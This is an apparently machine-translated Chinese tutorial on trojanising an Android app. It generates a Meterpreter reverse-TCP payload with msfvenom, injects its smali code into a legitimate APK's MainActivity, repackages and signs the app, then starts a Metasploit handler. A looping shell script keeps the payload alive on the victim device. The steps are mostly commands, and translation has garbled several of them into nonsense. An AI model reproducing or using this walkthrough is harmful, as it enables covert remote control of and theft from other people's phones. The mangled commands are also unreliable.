参考了网上很多大神的文章,做了简单的总结,请作为参考
1、MSF venom-p Android/meter preter/reverse _ tcpl host=本机IP LPORT=监听端口号-o virus.apk
2、apktook反编译virus.apk和normal.apk
3、在normal.apk门户网站normal.apk的androidManifest.xml文件中查找MainActivety和Launch关键字,
4、找到com/xxx/xxx/MainActivety.smail文件搜索onCreat函数,找到bundle对象,然后单击payload: invoke-static {p0},lcom ) v
5 .将virus.apk中的smail文件(payload中的smail/com/metasploit文件)复制到normal.apk中的smail/com/目录中
6、androidManifest.xml添加权限permission
7、编译回//https://blog.csdn.net/weixin _ 44212888/article/details/111396635
8、签署//https://blog.csdn.net/weixin _ 44212888/article/details/111396635
9、装壶//百度“装壶道具”
10、service postgresql start //启动数据库
11、启动MSF控制台//MSF
12、use exploit/multi/handler //路攻击模块
13、setpayloadandroid/meter preter/reverse _ TCP//选择要使用的payload
14、show options //查看应设置的参数
15、exploit //执行
16 )继续拦截sh脚本的编写,保存桌面并赋予权限
#! /bin/bash
while真
OAM start-- user0--a Android.intent.action.main (action标记)-ncom.metasploit.stage/. main activity
速度20
唐
meterpreter pwd //查找当前路径
meterpreter upload /root/桌面/chixu.sh //上传脚本
输入meter preter shell//shell
pwd
/
找到CD/data/user/0/com.Baidu.flashlight/files//脚本所在的文件夹
洛杉矶地铁
chixu.sh
运行sh chixu.sh //脚本
msf支持在线自动执行命令。 设置InitialAutoRunScript或autorunscript后,联机会话将自动上载和运行脚本